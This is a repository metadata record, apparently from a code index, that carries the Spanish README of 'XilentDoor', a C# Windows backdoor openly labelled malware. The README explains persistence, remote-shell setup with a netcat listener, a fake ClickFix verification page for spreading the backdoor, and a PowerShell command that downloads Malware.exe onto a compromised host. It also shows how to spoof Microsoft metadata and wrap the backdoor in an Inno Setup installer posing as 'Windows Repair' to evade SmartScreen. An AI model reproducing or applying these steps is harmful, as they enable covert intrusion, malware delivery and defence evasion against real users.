{"id":30220934,"url":"https://github.com/r3li4nt/xilentdoor","last_synced_at":"2026-03-10T18:02:08.290Z","repository":{"id":305964241,"uuid":"1024540157","full_name":"R3LI4NT/XilentDoor","owner":"R3LI4NT","description":"C# Backdoor ","archived":false,"fork":false,"pushed_at":"2025-10-28T23:05:53.000Z","size":184,"stargazers_count":5,"open_issues_count":0,"forks_count":0,"subscribers_count":0,"default_branch":"main","last_synced_at":"2025-10-29T00:25:53.464Z","etag":null,"topics":["backdoor","blackhat","csharp","hacking","malware","pentesting","windows"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/R3LI4NT.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2025-07-22T21:36:53.000Z","updated_at":"2025-10-28T23:05:08.000Z","dependencies_parsed_at":"2025-07-22T23:30:58.778Z","dependency_job_id":"84aa142e-4d7f-4f09-90ff-192cc7f0e3bc","html_url":"https://github.com/R3LI4NT/XilentDoor","commit_stats":null,"previous_names":["r3li4nt/xilentdoor"],"tags_count":1,"template":false,"template_full_name":null,"purl":"pkg:github/R3LI4NT/XilentDoor","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/R3LI4NT%2FXilentDoor","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/R3LI4NT%2FXilentDoor/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/R3LI4NT%2FXilentDoor/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/R3LI4NT%2FXilentDoor/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/R3LI4NT","download_url":"https://codeload.github.com/R3LI4NT/XilentDoor/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/R3LI4NT%2FXilentDoor/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":30346477,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-03-10T15:55:29.454Z","status":"ssl_error","status_checked_at":"2026-03-10T15:54:58.440Z","response_time":106,"last_error":"SSL_connect returned=1 errno=0 peeraddr=140.82.121.5:443 state=error: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["backdoor","blackhat","csharp","hacking","malware","pentesting","windows"],"created_at":"2025-08-14T09:17:22.113Z","updated_at":"2026-03-10T18:02:08.269Z","avatar_url":"https://github.com/R3LI4NT.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"\u003cp align=\"center\"\u003e\n  \u003cimg src=\"https://github.com/user-attachments/assets/ac3541ca-952e-4511-a259-764834982f8d\" alt=\"XilentDoor\" Logo\" /\u003e\n\u003c/p\u003e\n\n\u003cp align=\"center\"\u003e\n   \u003ca href=\"https://dotnet.microsoft.com/\"\u003e\n    \u003cimg src=\"https://img.shields.io/badge/C%23-Backdoor-blue.svg\"\u003e\n  \u003c/a\u003e\n    \u003cimg src=\"https://img.shields.io/badge/Release-2.0-blue.svg\"\u003e\n  \u003c/a\u003e\n    \u003cimg src=\"https://img.shields.io/badge/Public-%F0%9F%97%9D%EF%B8%8F-blue.svg\"\u003e\n  \u003c/a\u003e\n\u003c/p\u003e\n\n\u003ch1 align=\"center\"\u003e\u003c/h1\u003e\n\n### Acerca de XilentDoor\n\nXilentDoor es un backdoor escrito en C# orientado a sistemas Windows. Un backdoor es un tipo de malware diseñado para abrir una puerta trasera permanente en el equipo comprometido, permitiendo al atacante acceder y controlar el sistema de forma sigilosa. \n\nEs parte de la familia \u003ca href=\"https://github.com/R3LI4NT/XilentLocker\"\u003eXilentLocker\u003c/a\u003e, \u003ca href=\"https://github.com/R3LI4NT/XilentRAT\"\u003eXilentRAT\u003c/a\u003e y \u003ca href=\"https://github.com/R3LI4NT/XilentLogger\"\u003eXilentLogger\u003c/a\u003e\n\n\u003ch1 align=\"center\"\u003e\u003c/h1\u003e\n\n### Características de XilentDoor:\n\n- [x] **Persistencia:** El Backdoor se auto-copia en la ruta `AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup` y se agrega al registro Windows `Software\\Microsoft\\Windows\\CurrentVersion\\Run`; lo que permite que se ejecute automáticamente cada vez que el sistema se reinicie.\n      \u003cimg width=\"1173\" height=\"537\" alt=\"persistence\" src=\"https://github.com/user-attachments/assets/13799961-7f73-4b87-9df8-f82183bc6fa1\" /\u003e\n\n- [x] **Fingerprinting:** Recopila información básica del sistema donde se ejecuta el backdoor y almacena la información en la ruta `C:\\Windows\\Temp` bajo el nombre `SystemInfo.txt`. Esta funcionalidad se suele usar para identificar la máquina víctima o confirmar la infección exitosa antes de enviar datos al atacante.\n      \u003cimg width=\"603\" height=\"221\" alt=\"2\" src=\"https://github.com/user-attachments/assets/e15ade45-30cc-46a5-ba86-ac91e0acf4a3\" /\u003e\n\n- [x] **Shell:** Se desarrollo una shell GUI en Python para el backdoor. Puede ser utilizada por otros malwares.\n      \u003cimg width=\"1176\" height=\"719\" alt=\"XilentShell\" src=\"https://github.com/user-attachments/assets/d498d58b-dbe7-46f8-8751-03452e41536b\" /\u003e\n\n- [x] **AutoConnect:** El backdoor se auto-reconecta si se pierde la conexión. En el script `Backdoor.cs` se agrega un bucle infinito en el método `Start`. \n      \u003cimg width=\"809\" height=\"264\" alt=\"autoconnect\" src=\"https://github.com/user-attachments/assets/41f5c026-f6c1-4f19-b696-116ddc46d8fe\" /\u003e\n      \u003cimg width=\"690\" height=\"329\" alt=\"autoconnect\" src=\"https://github.com/user-attachments/assets/2b3a0f72-ac2d-4cc4-b8b2-27e68d839df9\" /\u003e\n\n- [x] **PowerScripts:** Se añadieron \u003ca href=\"https://github.com/R3LI4NT/XilentDoor/tree/main/PowerScripts\"\u003escritps\u003c/a\u003e hechos en PowerShell para que pueda deshabilitar procesos y defensas en el sistema remoto.\n\n- [x] **ClickFix:** Se diseño un sitio (\u003ca href=\"https://github.com/R3LI4NT/XilentDoor/blob/main/ClickFix/index.html\"\u003eindex.html\u003c/a\u003e) de verificación falso para distribuir malware utilizado la tecnica de \u003ca href=\"https://github.com/R3LI4NT/XilentDoor/blob/main/ClickFix/readme.md\"\u003eClickFix\u003c/a\u003e.\n    \u003cimg width=\"1349\" height=\"632\" alt=\"ClickFix\" src=\"https://github.com/user-attachments/assets/d12373b7-a87a-4dcf-8034-dc9e883da6c7\" /\u003e\n\n\u003ch1 align=\"center\"\u003e\u003c/h1\u003e\n\n### Modo de uso\n\n- (1) Tener instalado el SDK de .NET: https://dotnet.microsoft.com/en-us/download\n\n- (2) Compilar el backdoor con los siguientes comandos:\n```\ndotnet build -c Release \u003c- el .exe se guarda en XilentDoor\\bin\\Release\\net6.0\\XilentDoor.exe\ndotnet run \u003c- Ejecuta el Backdoor\n```\n\nCon el siguiente comando compilan el Backdoor con todas las dependencias, significa que podrán ejecutar el programa en cualquier directorio:\n```\ndotnet publish -c Release -r win-x64 --self-contained true /p:PublishSingleFile=true /p:IncludeAllContentForSelfExtract=true\n```\n\n- (3) En el método Main (archivo `Program.cs`) modifican la IP y puerto del listener (máquina atacante).\n  \u003cimg width=\"815\" height=\"159\" alt=\"3\" src=\"https://github.com/user-attachments/assets/9ba34ae3-382d-4609-a51b-c8bba95610d5\" /\u003e\n\n\u003ch1 align=\"center\"\u003e\u003c/h1\u003e\n\n### Backdoor Remoto\n\nPara infectar remotamente un sistema Windows, es necesario configurar un puerto en modo escucha en el router. Esto se puede lograr accediendo al panel de administración del router,  disponible en `http://192.168.1.1`. En la casilla de `LAN Host` es la IP local de la máquina atacante (Kali Linux) y el puerto puede ser aleatorio.\n\n\u003cimg width=\"826\" height=\"386\" alt=\"1\" src=\"https://github.com/user-attachments/assets/f779aa8b-884f-4c88-baed-e8d463f96d59\" /\u003e\n\n\u003cimg width=\"648\" height=\"258\" alt=\"2\" src=\"https://github.com/user-attachments/assets/23e41c4f-d9e4-4885-a628-061c06f39623\" /\u003e\n\nEn `Program.cs` ingresan su \u003ca href=\"https://whatismyipaddress.com/es/mi-ip\"\u003eIP pública\u003c/a\u003e y puerto, y compilan el programa a .EXE.\n\n\u003cimg width=\"791\" height=\"154\" alt=\"4\" src=\"https://github.com/user-attachments/assets/9d13e58f-0182-4832-a831-bbd4d7c591ff\" /\u003e\n\nEn la máquina atacante (Kali Linux), configure Netcat para escuchar en el puerto previamente seleccionado. Si el usuario ejecuta el programa, se establecerá una conexión y obtendrá acceso a una shell remota.\n\n\u003cimg width=\"1365\" height=\"720\" alt=\"3\" src=\"https://github.com/user-attachments/assets/79417535-c85e-4d9f-a297-42d18a99921b\" /\u003e\n\nUna vez usted haya ganado acceso al equipo, podrá utilizar Powershell para ejecutar comandos. Por ejemplo, descargar archivos remotos en el equipo comprometido:\n```powershell\npowershell -Command \"Invoke-WebRequest -Uri 'https://servidor-remoto/Malware.exe' -OutFile 'C:\\Windows\\Temp\\Malware.exe'\"\n```\n\n\u003cimg width=\"1281\" height=\"572\" alt=\"DownloadFile\" src=\"https://github.com/user-attachments/assets/f9f6bdf3-3a37-4a06-9ce6-27587fd4d1f2\" /\u003e\n\n\u003ch1 align=\"center\"\u003e\u003c/h1\u003e\n\n### Evasión Tips\n\nEn las pruebas realizadas con el backdoor, los antivirus externos no detectan su presencia. Sin embargo, Microsoft Defender SmartScreen actúa como un filtro reputacional, bloqueando ejecutables nuevos, no firmados o con poca distribución.\n\n\u003cimg width=\"450\" height=\"424\" alt=\"20240712112504846_EN_1\" src=\"https://github.com/user-attachments/assets/e30c4b2a-3309-4ff7-96e4-afefe45fe131\" /\u003e\n\nPara evadir SmartScreen, podemos firmar el ejecutable con un certificado digital (lo ideal es adquirir un certificado de firma de código, Code Signing Certificate) o bien empaquetar el instalador (.EXE/.MSI) y modificar sus metadatos para reducir su detectabilidad.\n\nPrimero debemos de modificar los metadatos y para ello podemos usar herramientas como \u003ca href=\"https://www.angusj.com/resourcehacker/\"\u003eResource Hacker\u003c/a\u003e o \u003ca href=\"https://github.com/electron/rcedit/releases\"\u003eRecedit\u003c/a\u003e.\n```\nrcedit-x64.exe XilentDoor.exe --set-version-string \"CompanyName\" \"Microsoft Corporation\" --set-version-string \"ProductName\" \"Windows Tool\" --set-version-string \"FileDescription\" \"Windows Repair\" --set-file-version \"1.3.5.0\" --set-product-version \"1.2.5.0\" --set-icon \"icon.ico\"\n```\n\n| PARÁMETRO | DESCRIPCIÓN |\n| ------------- | ------------- |\n| CompanyName | Nombre de la empresa/organización falsa. |\n| ProductName | Nombre del producto. |\n| FileDescription | Descripción que aparece en el taskmanager (Administrador de Tareas). |\n| --set-file-version | Versión técnica del archivo. |\n| --set-product-version | Versión del producto general. |\n| --set-icon | Icono visual. |\n\n\u003cimg width=\"1362\" height=\"562\" alt=\"evasion-metada\" src=\"https://github.com/user-attachments/assets/c7a9ad56-1281-48d0-abf2-56d03128851a\" /\u003e\n\nLuego empaquetaremos el .EXE/.MSI en un installer utilizando herramientas como \u003ca href=\"https://jrsoftware.org/isdl.php\"\u003eInno SetUp\u003c/a\u003e o \u003ca href=\"https://nsis.sourceforge.io/Main_Page\"\u003eNSIS\u003c/a\u003e. En mi caso utilizaré Inno, luego de escribir los metadatos del .EXE debemos de crear un script con el nombre `instalador.iss` con el siguiente contenido:\n```python\n[Setup]\nAppName=Windows Tool\nAppVersion=1.3.5.0\nDefaultDirName={localappdata}\\WindowsRepair\nDisableProgramGroupPage=yes\nOutputDir=.\nOutputBaseFilename=installer_windows_tool\nCompression=lzma\nSolidCompression=yes\n\n[Files]\nSource: \"C:\\Users\\Usuario\\Desktop\\MALWARE\\Evasion\\XilentDoor.exe\"; DestDir: \"{app}\"; Flags: ignoreversion\n\n[Icons]\nName: \"{userstartup}\\Windows Repair\"; Filename: \"{app}\\XilentDoor.exe\"; IconFilename: \"{app}\\XilentDoor.exe\"\n\n[Run]\nFilename: \"{app}\\XilentDoor.exe\"; Description: \"Ejecutando Windows Repair...\"; Flags: nowait postinstall skipifsilent\n```\n\n| PARÁMETRO | DESCRIPCIÓN |\n| ------------- | ------------- |\n| AppName y AppVersion | Nombre visible del programa falso. |\n| DefaultDirName | Instala en AppData\\WindowsAudio (poco sospechoso). |\n| OutputDir | El .exe del instalador se guardará en el mismo directorio. |\n| Files | Copia XilentDoor.exe a la carpeta destino. |\n| Icons | Crea una entrada en Inicio → Ejecutar al iniciar sesión. |\n| Run | Ejecuta el backdoor automáticamente tras la instalación. |\n\nEn el menu de Inno le damos a `Build` **-\u003e** `Compile`.\n\n\u003cimg width=\"1365\" height=\"621\" alt=\"evasion-installerSetUp\" src=\"https://github.com/user-attachments/assets/80557abf-d0f2-4046-9469-e441f9e99e22\" /\u003e\n\nNos dejará el instalador \"legítimo\", pero detrás se ejecutará el backdoor y en el Administrador de Tareas aparecerá como una herramienta de reparación de Windows.\n\n\u003cimg width=\"818\" height=\"398\" alt=\"evasion-installerSetUp-2\" src=\"https://github.com/user-attachments/assets/6511756f-cd85-418c-8577-baa644653753\" /\u003e\n\n\u003ch1 align=\"center\"\u003e\u003c/h1\u003e\n\nCorreo de contacto:\n\n\u003cimg src=\"https://img.shields.io/badge/r3li4nt.contact@keemail.me-D14836?style=for-the-badge\u0026logo=gmail\u0026logoColor=white\" /\u003e\n\n\u003ch1 align=\"center\"\u003e\u003c/h1\u003e\n\n\u003e [!CAUTION]\n\u003e Cualquier uso indebido de este software será de exclusiva responsabilidad del usuario final, y no del autor. Este proyecto tiene como objetivo inicial demostrar las capacidades de C# como lenguaje para el desarrollo de malware en entornos controlados. \n\n\u003ch1 align=\"center\"\u003e\u003c/h1\u003e\n\n#### Developer: ~R3LI4NT~\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fr3li4nt%2Fxilentdoor","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fr3li4nt%2Fxilentdoor","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fr3li4nt%2Fxilentdoor/lists"}